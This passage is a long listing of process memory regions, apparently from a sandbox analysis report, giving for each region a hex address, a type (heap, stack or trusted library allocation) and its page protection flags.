page read and write
|
||
21F81096000
|
trusted library allocation
|
page read and write
|
||
1B6D71EB000
|
heap
|
page read and write
|
||
21FF17D3000
|
heap
|
page read and write
|
||
22734E96000
|
heap
|
page execute and read and write
|
||
2271CDED000
|
trusted library allocation
|
page read and write
|
||
7FFD9A462000
|
trusted library allocation
|
page read and write
|
||
7FFD9A62C000
|
trusted library allocation
|
page read and write
|
||
21FF1706000
|
heap
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
1D6CA160000
|
trusted library allocation
|
page read and write
|
||
1D6C9EB3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A604000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5D0000
|
trusted library allocation
|
page read and write
|
||
5DBBD0C000
|
stack
|
page read and write
|
||
7FFD9A2CD000
|
trusted library allocation
|
page execute and read and write
|
||
2271C9A6000
|
trusted library allocation
|
page read and write
|
||
BF093CD000
|
stack
|
page read and write
|
||
4AE000
|
heap
|
page read and write
|
||
7FFD9A490000
|
trusted library allocation
|
page read and write
|
||
2B08000
|
trusted library allocation
|
page read and write
|
||
21FEF760000
|
heap
|
page read and write
|
||
2271E18D000
|
trusted library allocation
|
page read and write
|
||
2271DBD0000
|
trusted library allocation
|
page read and write
|
||
2271DC65000
|
trusted library allocation
|
page read and write
|
||
21F90001000
|
trusted library allocation
|
page read and write
|
||
A03AC3E000
|
stack
|
page read and write
|
||
2271AF5D000
|
heap
|
page read and write
|
||
428017E000
|
stack
|
page read and write
|
||
1B6BE630000
|
trusted library allocation
|
page read and write
|
||
1B6BFB15000
|
trusted library allocation
|
page read and write
|
||
7FFD9A700000
|
trusted library allocation
|
page read and write
|
||
7FFD9A700000
|
trusted library allocation
|
page read and write
|
||
1D6E16B1000
|
heap
|
page read and write
|
||
42FFAFE000
|
stack
|
page read and write
|
||
7FFD9A6E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A293000
|
trusted library allocation
|
page execute and read and write
|
||
21F80F83000
|
trusted library allocation
|
page read and write
|
||
1BC24000
|
stack
|
page read and write
|
||
7FFD9A5B0000
|
trusted library allocation
|
page read and write
|
||
1D6E1340000
|
trusted library allocation
|
page read and write
|
||
1CA4E000
|
stack
|
page read and write
|
||
7FFD9A5C0000
|
trusted library allocation
|
page read and write
|
||
1B6BCD67000
|
heap
|
page read and write
|
||
7FFD9A4F0000
|
trusted library allocation
|
page read and write
|
||
1B6C0574000
|
trusted library allocation
|
page read and write
|
||
21FF0DF0000
|
heap
|
page read and write
|
||
2ABA000
|
trusted library allocation
|
page read and write
|
||
1B6C00A3000
|
trusted library allocation
|
page read and write
|
||
1C6CA000
|
stack
|
page read and write
|
||
BF0867E000
|
stack
|
page read and write
|
||
1B6BCCE0000
|
heap
|
page read and write
|
||
2272C991000
|
trusted library allocation
|
page read and write
|
||
1B6D7226000
|
heap
|
page read and write
|
||
21F81954000
|
trusted library allocation
|
page read and write
|
||
7FFD9A480000
|
trusted library allocation
|
page execute and read and write
|
||
21FF1350000
|
heap
|
page read and write
|
||
22734920000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2CD000
|
trusted library allocation
|
page execute and read and write
|
||
1B998000
|
heap
|
page read and write
|
||
7FFD9A2D0000
|
trusted library allocation
|
page read and write
|
||
21FEF403000
|
heap
|
page read and write
|
||
42FFD77000
|
stack
|
page read and write
|
||
1CA0F000
|
stack
|
page read and write
|
||
1B6BF9F8000
|
trusted library allocation
|
page read and write
|
||
1B6CEA3C000
|
trusted library allocation
|
page read and write
|
||
1B6BF34E000
|
trusted library allocation
|
page read and write
|
||
1B6D6E6B000
|
heap
|
page read and write
|
||
7FF4BB450000
|
trusted library allocation
|
page execute and read and write
|
||
1CD4C000
|
stack
|
page read and write
|
||
7FFD9A293000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2A4000
|
trusted library allocation
|
page read and write
|
||
21FF17C1000
|
heap
|
page read and write
|
||
2271D9E7000
|
trusted library allocation
|
page read and write
|
||
1D6C729D000
|
heap
|
page read and write
|
||
7FFD9A570000
|
trusted library allocation
|
page read and write
|
||
7FFD9A570000
|
trusted library allocation
|
page read and write
|
||
1B6BE620000
|
heap
|
page readonly
|
||
1C2AD000
|
stack
|
page read and write
|
||
7FFD9A2D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A620000
|
trusted library allocation
|
page read and write
|
||
1C7C8000
|
stack
|
page read and write
|
||
21F90073000
|
trusted library allocation
|
page read and write
|
||
1B6BCD63000
|
heap
|
page read and write
|
||
7FFD9A2C3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2BB000
|
trusted library allocation
|
page execute and read and write
|
||
5DBBF0E000
|
stack
|
page read and write
|
||
22734F2B000
|
heap
|
page read and write
|
||
2271E701000
|
trusted library allocation
|
page read and write
|
||
22735207000
|
heap
|
page read and write
|
||
1B6D6C75000
|
heap
|
page read and write
|
||
1B6BE6A0000
|
heap
|
page read and write
|
||
2272C941000
|
trusted library allocation
|
page read and write
|
||
1D6CAD17000
|
trusted library allocation
|
page read and write
|
||
BF091CE000
|
stack
|
page read and write
|
||
7FFD9A5E3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4D0000
|
trusted library allocation
|
page read and write
|
||
613000
|
heap
|
page read and write
|
||
502000
|
heap
|
page read and write
|
||
2A31000
|
trusted library allocation
|
page read and write
|
||
1CC4A000
|
stack
|
page read and write
|
||
4280C8C000
|
stack
|
page read and write
|
||
1B6D71E0000
|
heap
|
page read and write
|
||
1DDA0000
|
heap
|
page read and write
|
||
2271C921000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5D3000
|
trusted library allocation
|
page read and write
|
||
1D6C8F86000
|
trusted library allocation
|
page read and write
|
||
1B6BCFC0000
|
heap
|
page read and write
|
||
1B6CEA4B000
|
trusted library allocation
|
page read and write
|
||
21FF165E000
|
heap
|
page read and write
|
||
1D6D8F31000
|
trusted library allocation
|
page read and write
|
||
1D6C9B07000
|
trusted library allocation
|
page read and write
|
||
21F81DE0000
|
trusted library allocation
|
page read and write
|
||
21FF0D80000
|
trusted library allocation
|
page read and write
|
||
21F9030B000
|
trusted library allocation
|
page read and write
|
||
BF0877E000
|
stack
|
page read and write
|
||
21F812AE000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2EC000
|
trusted library allocation
|
page execute and read and write
|
||
21FF1666000
|
heap
|
page read and write
|
||
7FFD9A340000
|
trusted library allocation
|
page read and write
|
||
1D6C7252000
|
heap
|
page read and write
|
||
1D6E13A7000
|
heap
|
page read and write
|
||
1D6D8F20000
|
trusted library allocation
|
page read and write
|
||
124A3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5E0000
|
trusted library allocation
|
page read and write
|
||
1C324000
|
heap
|
page read and write
|
||
2B11000
|
trusted library allocation
|
page read and write
|
||
12418000
|
trusted library allocation
|
page read and write
|
||
1D6CAD37000
|
trusted library allocation
|
page read and write
|
||
21FF14F7000
|
heap
|
page execute and read and write
|
||
A2C000
|
heap
|
page read and write
|
||
7FFD9A510000
|
trusted library allocation
|
page read and write
|
||
21FF13B8000
|
heap
|
page read and write
|
||
2271E726000
|
trusted library allocation
|
page read and write
|
||
1B96B000
|
heap
|
page read and write
|
||
1B6C0044000
|
trusted library allocation
|
page read and write
|
||
1CB4C000
|
stack
|
page read and write
|
||
5DBB1BE000
|
stack
|
page read and write
|
||
1C5CE000
|
stack
|
page read and write
|
||
426000
|
heap
|
page read and write
|
||
21F80C41000
|
trusted library allocation
|
page read and write
|
||
21FF16C7000
|
heap
|
page read and write
|
||
21FF17CB000
|
heap
|
page read and write
|
||
622000
|
heap
|
page read and write
|
||
4C4000
|
heap
|
page read and write
|
||
21FF16A9000
|
heap
|
page read and write
|
||
1C32C000
|
heap
|
page read and write
|
||
2411000
|
trusted library allocation
|
page read and write
|
||
902000
|
heap
|
page read and write
|
||
7FFD9A6C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A386000
|
trusted library allocation
|
page execute and read and write
|
||
21FEF409000
|
heap
|
page read and write
|
||
A03A67E000
|
stack
|
page read and write
|
||
5DBA9DD000
|
stack
|
page read and write
|
||
911000
|
stack
|
page read and write
|
||
1B6BE600000
|
trusted library allocation
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
7FFD9A376000
|
trusted library allocation
|
page execute and read and write
|
||
1C2FF000
|
stack
|
page read and write
|
||
2271C800000
|
trusted library allocation
|
page read and write
|
||
BF0944E000
|
stack
|
page read and write
|
||
1B6C0579000
|
trusted library allocation
|
page read and write
|
||
1B6BCFC5000
|
heap
|
page read and write
|
||
446000
|
heap
|
page read and write
|
||
2990000
|
heap
|
page read and write
|
||
7FFD9A6AC000
|
trusted library allocation
|
page read and write
|
||
7FFD9A460000
|
trusted library allocation
|
page read and write
|
||
2271D527000
|
trusted library allocation
|
page read and write
|
||
6BB000
|
heap
|
page read and write
|
||
7FFD9A2C4000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A500000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2A3000
|
trusted library allocation
|
page execute and read and write
|
||
2271C870000
|
heap
|
page read and write
|
||
7FFD9A600000
|
trusted library allocation
|
page read and write
|
||
2271AEB0000
|
heap
|
page read and write
|
||
BF08073000
|
stack
|
page read and write
|
||
2ABD000
|
trusted library allocation
|
page read and write
|
||
5DBADF9000
|
stack
|
page read and write
|
||
22734950000
|
trusted library allocation
|
page read and write
|
||
1D6D9209000
|
trusted library allocation
|
page read and write
|
||
1B6BE6C0000
|
trusted library allocation
|
page read and write
|
||
1B6BCDC3000
|
heap
|
page read and write
|
||
7FFD9A560000
|
trusted library allocation
|
page read and write
|
||
7FFD9A580000
|
trusted library allocation
|
page read and write
|
||
7FFD9A730000
|
trusted library allocation
|
page read and write
|
||
7FFD9A376000
|
trusted library allocation
|
page execute and read and write
|
||
21FF13EB000
|
heap
|
page read and write
|
||
1D6C92C1000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A620000
|
trusted library allocation
|
page read and write
|
||
7FFD9A3C0000
|
trusted library allocation
|
page execute and read and write
|
||
21FEF40B000
|
heap
|
page read and write
|
||
1B6D729F000
|
heap
|
page read and write
|
||
7FFD9A4A0000
|
trusted library allocation
|
page read and write
|
||
A03AD3D000
|
stack
|
page read and write
|
||
1B6D72A7000
|
heap
|
page read and write
|
||
124A8000
|
trusted library allocation
|
page read and write
|
||
1D6C9F3F000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5E4000
|
trusted library allocation
|
page read and write
|
||
21FF135F000
|
heap
|
page read and write
|
||
22735214000
|
heap
|
page read and write
|
||
42FFEBE000
|
stack
|
page read and write
|
||
7FFD9A4E0000
|
trusted library allocation
|
page read and write
|
||
1D6C9B17000
|
trusted library allocation
|
page read and write
|
||
7FFD9A520000
|
trusted library allocation
|
page read and write
|
||
21F80F72000
|
trusted library allocation
|
page read and write
|
||
A03AAB6000
|
stack
|
page read and write
|
||
7FFD9A47A000
|
trusted library allocation
|
page read and write
|
||
7FFD9A628000
|
trusted library allocation
|
page read and write
|
||
7FFD9A706000
|
trusted library allocation
|
page read and write
|
||
1B6D6C86000
|
heap
|
page read and write
|
||
7FFD9A478000
|
trusted library allocation
|
page read and write
|
||
227351FE000
|
heap
|
page read and write
|
||
7FFD9A630000
|
trusted library allocation
|
page read and write
|
||
1D6E13F6000
|
heap
|
page read and write
|
||
2B1F000
|
trusted library allocation
|
page read and write
|
||
1B6BF875000
|
trusted library allocation
|
page read and write
|
||
1D6E1390000
|
heap
|
page read and write
|
||
7FFD9A690000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5F4000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4F0000
|
trusted library allocation
|
page read and write
|
||
1D6C74C0000
|
trusted library section
|
page read and write
|
||
1D6E13F8000
|
heap
|
page read and write
|
||
7FFD9A360000
|
trusted library allocation
|
page read and write
|
||
1D6C920C000
|
trusted library allocation
|
page read and write
|
||
1B4E5000
|
stack
|
page read and write
|
||
22735221000
|
heap
|
page read and write
|
||
A03A3D3000
|
stack
|
page read and write
|
||
7FFD9A610000
|
trusted library allocation
|
page read and write
|
||
124A1000
|
trusted library allocation
|
page read and write
|
||
1C0FE000
|
stack
|
page read and write
|
||
29A1000
|
trusted library allocation
|
page read and write
|
||
A03A9F9000
|
stack
|
page read and write
|
||
1B6BCCB0000
|
heap
|
page read and write
|
||
1D6E139A000
|
heap
|
page read and write
|
||
2272CC0A000
|
trusted library allocation
|
page read and write
|
||
A20000
|
heap
|
page read and write
|
||
1B957000
|
heap
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
1B6D72A3000
|
heap
|
page read and write
|
||
7FFD9A31C000
|
trusted library allocation
|
page execute and read and write
|
||
1D6CA2D7000
|
trusted library allocation
|
page read and write
|
||
21FF0DE0000
|
heap
|
page execute and read and write
|
||
7FFD9A550000
|
trusted library allocation
|
page read and write
|
||
1C1AE000
|
stack
|
page read and write
|
||
428027B000
|
stack
|
page read and write
|
||
1D6C9B0F000
|
trusted library allocation
|
page read and write
|
||
7FFD9A3B0000
|
trusted library allocation
|
page execute and read and write
|
||
2271ADD0000
|
heap
|
page read and write
|
||
7FFD9A4E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A490000
|
trusted library allocation
|
page execute and read and write
|
||
21F8186C000
|
trusted library allocation
|
page read and write
|
||
7FFD9A3D0000
|
trusted library allocation
|
page execute and read and write
|
||
1B6D7289000
|
heap
|
page read and write
|
||
2271D987000
|
trusted library allocation
|
page read and write
|
||
1C1FE000
|
stack
|
page read and write
|
||
1D6CA865000
|
trusted library allocation
|
page read and write
|
||
1A9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2BD000
|
trusted library allocation
|
page execute and read and write
|
||
21FF166A000
|
heap
|
page read and write
|
||
2300000
|
heap
|
page execute and read and write
|
||
5DBB13E000
|
stack
|
page read and write
|
||
1A91C000
|
stack
|
page read and write
|
||
7FFD9A590000
|
trusted library allocation
|
page read and write
|
||
7FFD9A460000
|
trusted library allocation
|
page read and write
|
||
21F80F6E000
|
trusted library allocation
|
page read and write
|
||
2272CC0E000
|
trusted library allocation
|
page read and write
|
||
1C2D1000
|
heap
|
page read and write
|
||
1CF4C000
|
stack
|
page read and write
|
||
1B6BCF80000
|
heap
|
page read and write
|
||
7FFD9A480000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A550000
|
trusted library allocation
|
page read and write
|
||
1D6C8EE0000
|
heap
|
page execute and read and write
|
||
7FFD9A6BC000
|
trusted library allocation
|
page read and write
|
||
7FFD9A294000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2E0000
|
trusted library allocation
|
page read and write
|
||
1B6D6EEA000
|
heap
|
page read and write
|
||
42801FF000
|
stack
|
page read and write
|
||
1D6C9BD1000
|
trusted library allocation
|
page read and write
|
||
438000
|
heap
|
page read and write
|
||
21F81892000
|
trusted library allocation
|
page read and write
|
||
7FFD9A482000
|
trusted library allocation
|
page read and write
|
||
7FFD9A45A000
|
trusted library allocation
|
page read and write
|
||
1D6E16BB000
|
heap
|
page read and write
|
||
1C7D0000
|
heap
|
page read and write
|
||
1B6D72AF000
|
heap
|
page read and write
|
||
1D6E16CB000
|
heap
|
page read and write
|
||
2273513E000
|
heap
|
page read and write
|
||
7FFD9A29D000
|
trusted library allocation
|
page execute and read and write
|
||
2271D59D000
|
trusted library allocation
|
page read and write
|
||
D43000
|
heap
|
page execute and read and write
|
||
21FF172E000
|
heap
|
page read and write
|
||
21FF0EF5000
|
heap
|
page read and write
|
||
1B6D6E5F000
|
heap
|
page read and write
|
||
7FFD9A29D000
|
trusted library allocation
|
page execute and read and write
|
||
1B6BFFBB000
|
trusted library allocation
|
page read and write
|
||
22735225000
|
heap
|
page read and write
|
||
7FFD9A4C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6A0000
|
trusted library allocation
|
page read and write
|
||
1D6C7247000
|
heap
|
page read and write
|
||
2271E746000
|
trusted library allocation
|
page read and write
|
||
1C7F9000
|
heap
|
page read and write
|
||
7FFD9A494000
|
trusted library allocation
|
page read and write
|
||
7DF46D160000
|
trusted library allocation
|
page execute and read and write
|
||
7DF4162A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2C0000
|
trusted library allocation
|
page read and write
|
||
12411000
|
trusted library allocation
|
page read and write
|
||
7FFD9A580000
|
trusted library allocation
|
page read and write
|
||
A03A97D000
|
stack
|
page read and write
|
||
1D6C7350000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
A26000
|
heap
|
page read and write
|
||
2271B1C0000
|
trusted library section
|
page read and write
|
||
7FFD9A4E0000
|
trusted library allocation
|
page read and write
|
||
22E0000
|
trusted library allocation
|
page read and write
|
||
7DF000
|
stack
|
page read and write
|
||
21F804CD000
|
trusted library allocation
|
page read and write
|
||
7FFD9A451000
|
trusted library allocation
|
page read and write
|
||
22735177000
|
heap
|
page read and write
|
||
1C7D4000
|
heap
|
page read and write
|
||
1B6BCD29000
|
heap
|
page read and write
|
||
1010000
|
heap
|
page read and write
|
||
BF08379000
|
stack
|
page read and write
|
||
21F81311000
|
trusted library allocation
|
page read and write
|
||
7FFD9A61C000
|
trusted library allocation
|
page read and write
|
||
2271D9BB000
|
trusted library allocation
|
page read and write
|
||
1D6E1590000
|
heap
|
page read and write
|
||
21FF136F000
|
heap
|
page read and write
|
||
7FFD9A34C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2BB000
|
trusted library allocation
|
page read and write
|
||
1D6C9238000
|
trusted library allocation
|
page read and write
|
||
7FFD9A36C000
|
trusted library allocation
|
page execute and read and write
|
||
677000
|
heap
|
page read and write
|
||
1B6CEA43000
|
trusted library allocation
|
page read and write
|
||
7FFD9A630000
|
trusted library allocation
|
page read and write
|
||
1C2FD000
|
heap
|
page read and write
|
||
7FFD9A498000
|
trusted library allocation
|
page read and write
|
||
1B6BCCE8000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
1B6C052F000
|
trusted library allocation
|
page read and write
|
||
1D6C9C8B000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4E0000
|
trusted library allocation
|
page read and write
|
||
2271B1D5000
|
heap
|
page read and write
|
||
1D6CA698000
|
trusted library allocation
|
page read and write
|
||
1A88D000
|
stack
|
page read and write
|
||
7FFD9A4A2000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A350000
|
trusted library allocation
|
page execute and read and write
|
||
1D6C93DD000
|
trusted library allocation
|
page read and write
|
||
2A80000
|
trusted library allocation
|
page read and write
|
||
21F818F5000
|
trusted library allocation
|
page read and write
|
||
641000
|
heap
|
page read and write
|
||
7FFD9A6E6000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5A0000
|
trusted library allocation
|
page read and write
|
||
1B6BCCF2000
|
heap
|
page read and write
|
||
1D6CA21C000
|
trusted library allocation
|
page read and write
|
||
1C2B0000
|
heap
|
page read and write
|
||
2271AF3D000
|
heap
|
page read and write
|
||
2271DCED000
|
trusted library allocation
|
page read and write
|
||
1B6CE7C3000
|
trusted library allocation
|
page read and write
|
||
1B6BF507000
|
trusted library allocation
|
page read and write
|
||
2272C951000
|
trusted library allocation
|
page read and write
|
||
1D6E170D000
|
heap
|
page read and write
|
||
1D6CA1E8000
|
trusted library allocation
|
page read and write
|
||
21F81127000
|
trusted library allocation
|
page read and write
|
||
1D6C8CB0000
|
heap
|
page readonly
|
||
646000
|
heap
|
page read and write
|
||
7FFD9A442000
|
trusted library allocation
|
page read and write
|
||
1D6E15DE000
|
heap
|
page read and write
|
||
7FFD9A461000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A3A6000
|
trusted library allocation
|
page execute and read and write
|
||
2271E74B000
|
trusted library allocation
|
page read and write
|
||
A03AB39000
|
stack
|
page read and write
|
||
1D6CAD3C000
|
trusted library allocation
|
page read and write
|
||
7FFD9A440000
|
trusted library allocation
|
page read and write
|
||
1D6E1657000
|
heap
|
page read and write
|
||
21FF1740000
|
heap
|
page read and write
|
||
1B6CE751000
|
trusted library allocation
|
page read and write
|
||
7FFD9A3A6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2A3000
|
trusted library allocation
|
page read and write
|
||
2272CC18000
|
trusted library allocation
|
page read and write
|
||
63E000
|
heap
|
page read and write
|
||
7FFD9A580000
|
trusted library allocation
|
page read and write
|
||
21F90031000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5F2000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6A0000
|
trusted library allocation
|
page read and write
|
||
1D6C8CA0000
|
trusted library allocation
|
page read and write
|
||
22C0000
|
trusted library allocation
|
page read and write
|
||
21FF0EF0000
|
heap
|
page read and write
|
||
7FFD9A5D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A46A000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A450000
|
trusted library allocation
|
page execute and read and write
|
||
21FEF4BD000
|
heap
|
page read and write
|
||
A03AE3B000
|
stack
|
page read and write
|
||
5DBA8D3000
|
stack
|
page read and write
|
||
1B6BFA8D000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6F0000
|
trusted library allocation
|
page read and write
|
||
1D6C727C000
|
heap
|
page read and write
|
||
7FFD9A2D4000
|
trusted library allocation
|
page read and write
|
||
7FFD9A370000
|
trusted library allocation
|
page read and write
|
||
21F81E2A000
|
trusted library allocation
|
page read and write
|
||
A03ACBE000
|
stack
|
page read and write
|
||
1B6D7213000
|
heap
|
page read and write
|
||
21FF178F000
|
heap
|
page read and write
|
||
21FF17B7000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
21FF1694000
|
heap
|
page read and write
|
||
1B6CE771000
|
trusted library allocation
|
page read and write
|
||
2273522E000
|
heap
|
page read and write
|
||
21FEF448000
|
heap
|
page read and write
|
||
21FF0DA0000
|
trusted library allocation
|
page read and write
|
||
42FFA73000
|
stack
|
page read and write
|
||
1B6D72AB000
|
heap
|
page read and write
|
||
21FF1960000
|
heap
|
page read and write
|
||
21FF165A000
|
heap
|
page read and write
|
||
7FFD9A614000
|
trusted library allocation
|
page read and write
|
||
BF08579000
|
stack
|
page read and write
|
||
A93000
|
heap
|
page read and write
|
||
A03ABB7000
|
stack
|
page read and write
|
||
22734EE6000
|
heap
|
page read and write
|
||
1D6CA77D000
|
trusted library allocation
|
page read and write
|
||
21FEF3FE000
|
heap
|
page read and write
|
||
1C334000
|
heap
|
page read and write
|
||
1B6D72D9000
|
heap
|
page read and write
|
||
2271DB78000
|
trusted library allocation
|
page read and write
|
||
5DBACFA000
|
stack
|
page read and write
|
||
1D6C7283000
|
heap
|
page read and write
|
||
9FE000
|
stack
|
page read and write
|
||
7FFD9A520000
|
trusted library allocation
|
page read and write
|
||
7FFD9A700000
|
trusted library allocation
|
page read and write
|
||
7FFD9A492000
|
trusted library allocation
|
page read and write
|
||
62D000
|
heap
|
page read and write
|
||
7FFD9A2BD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A2C4000
|
trusted library allocation
|
page read and write
|
||
1D6C9F14000
|
trusted library allocation
|
page read and write
|
||
22734EA0000
|
heap
|
page read and write
|
||
22734E90000
|
heap
|
page execute and read and write
|
||
7FFD9A4A4000
|
trusted library allocation
|
page read and write
|
||
12413000
|
trusted library allocation
|
page read and write
|
||
2271D694000
|
trusted library allocation
|
page read and write
|
||
21FF139D000
|
heap
|
page read and write
|
||
7FFD9A2B0000
|
trusted library allocation
|
page read and write
|
||
21F811E1000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2DD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A6ED000
|
trusted library allocation
|
page read and write
|
||
2271D92A000
|
trusted library allocation
|
page read and write
|
||
7FFD9A480000
|
trusted library allocation
|
page execute and read and write
|
||
1D6CA123000
|
trusted library allocation
|
page read and write
|
||
D00000
|
trusted library allocation
|
page read and write
|
||
1B6BCD3B000
|
heap
|
page read and write
|
||
1B6D6D70000
|
heap
|
page read and write
|
||
1D6C9FA5000
|
trusted library allocation
|
page read and write
|
||
625000
|
heap
|
page read and write
|
||
7FFD9A430000
|
trusted library allocation
|
page read and write
|
||
7FFD9A560000
|
trusted library allocation
|
page read and write
|
||
2271E216000
|
trusted library allocation
|
page read and write
|
||
22F0000
|
heap
|
page read and write
|
||
A03B88D000
|
stack
|
page read and write
|
||
1B6D6DB3000
|
heap
|
page read and write
|
||
7FFD9A450000
|
trusted library allocation
|
page execute and read and write
|
||
42FFDFD000
|
stack
|
page read and write
|
||
21F902F3000
|
trusted library allocation
|
page read and write
|
||
1D6C7450000
|
heap
|
page read and write
|
||
7FFD9A292000
|
trusted library allocation
|
page read and write
|
||
7FFD9A4C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A380000
|
trusted library allocation
|
page execute and read and write
|
||
1D6E168C000
|
heap
|
page read and write
|
||
7DF49F140000
|
trusted library allocation
|
page execute and read and write
|
||
702000
|
heap
|
page read and write
|
||
1B6D6EC4000
|
heap
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
1D6E15E7000
|
heap
|
page read and write
|
||
A03A7F9000
|
stack
|
page read and write
|
||
7FFD9A6C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A432000
|
trusted library allocation
|
page read and write
|
||
7DF4162B0000
|
trusted library allocation
|
page execute and read and write
|
||
2271CB49000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
1B6BE979000
|
trusted library allocation
|
page read and write
|
||
21FF16F1000
|
heap
|
page read and write
|
||
7FFD9A3B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A6F0000
|
trusted library allocation
|
page read and write
|
||
1B6C0554000
|
trusted library allocation
|
page read and write
|
||
7FFD9A510000
|
trusted library allocation
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
7FFD9A500000
|
trusted library allocation
|
page read and write
|
||
1D6CA1B8000
|
trusted library allocation
|
page read and write
|
||
550000
|
trusted library allocation
|
page read and write
|
||
1AD5F000
|
stack
|
page read and write
|
||
A02000
|
heap
|
page read and write
|
||
A03B909000
|
stack
|
page read and write
|
||
7FFD9A31C000
|
trusted library allocation
|
page execute and read and write
|
||
21F811AF000
|
trusted library allocation
|
page read and write
|
||
1B6BCDD3000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
BF085F8000
|
stack
|
page read and write
|
||
413000
|
heap
|
page read and write
|
||
1B6BE6B0000
|
heap
|
page execute and read and write
|
||
BF086FE000
|
stack
|
page read and write
|
||
1B6BF1A2000
|
trusted library allocation
|
page read and write
|
||
1D6E15A3000
|
heap
|
page read and write
|
||
21FF1830000
|
trusted library allocation
|
page read and write
|
||
D40000
|
heap
|
page execute and read and write
|
||
400000
|
heap
|
page read and write
|
||
1D6E16CD000
|
heap
|
page read and write
|
||
7FFD9A540000
|
trusted library allocation
|
page read and write
|
||
1D6C8D30000
|
trusted library allocation
|
page read and write
|
||
1D6E1448000
|
heap
|
page read and write
|
||
451000
|
heap
|
page read and write
|
||
7FFD9A294000
|
trusted library allocation
|
page read and write
|
||
BF0827A000
|
stack
|
page read and write
|
||
7FFD9A432000
|
trusted library allocation
|
page read and write
|
||
29FF000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2C2000
|
trusted library allocation
|
page read and write
|
||
7FFD9A460000
|
trusted library allocation
|
page execute and read and write
|
||
1B6BE660000
|
trusted library allocation
|
page read and write
|
||
7DF4726F0000
|
trusted library allocation
|
page execute and read and write
|
||
960000
|
heap
|
page read and write
|
||
1B2B0000
|
heap
|
page read and write
|
||
5DBB03A000
|
stack
|
page read and write
|
||
2271C7F0000
|
trusted library section
|
page read and write
|
||
7FFD9A60C000
|
trusted library allocation
|
page read and write
|
||
7FFD9A3E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A293000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A530000
|
trusted library allocation
|
page read and write
|
||
21FF1500000
|
heap
|
page read and write
|
||
1B6D6D97000
|
heap
|
page read and write
|
||
1B6D6ECB000
|
heap
|
page read and write
|
||
1B3EE000
|
stack
|
page read and write
|
||
21F902EC000
|
trusted library allocation
|
page read and write
|
||
21FF1662000
|
heap
|
page read and write
|
||
21F80229000
|
trusted library allocation
|
page read and write
|
||
2B23000
|
trusted library allocation
|
page read and write
|
||
7FFD9A618000
|
trusted library allocation
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
1D6C9E05000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6D0000
|
trusted library allocation
|
page read and write
|
||
1D6C8F11000
|
trusted library allocation
|
page read and write
|
||
2271D519000
|
trusted library allocation
|
page read and write
|
||
7FFD9A620000
|
trusted library allocation
|
page read and write
|
||
1B5EE000
|
stack
|
page read and write
|
||
7FFD9A500000
|
trusted library allocation
|
page read and write
|
||
21F902F1000
|
trusted library allocation
|
page read and write
|
||
1B6BCC90000
|
heap
|
page read and write
|
||
1D6CA24F000
|
trusted library allocation
|
page read and write
|
||
1015000
|
heap
|
page read and write
|
||
2271DA4B000
|
trusted library allocation
|
page read and write
|
||
2271AF84000
|
heap
|
page read and write
|
||
1C7E3000
|
heap
|
page read and write
|
||
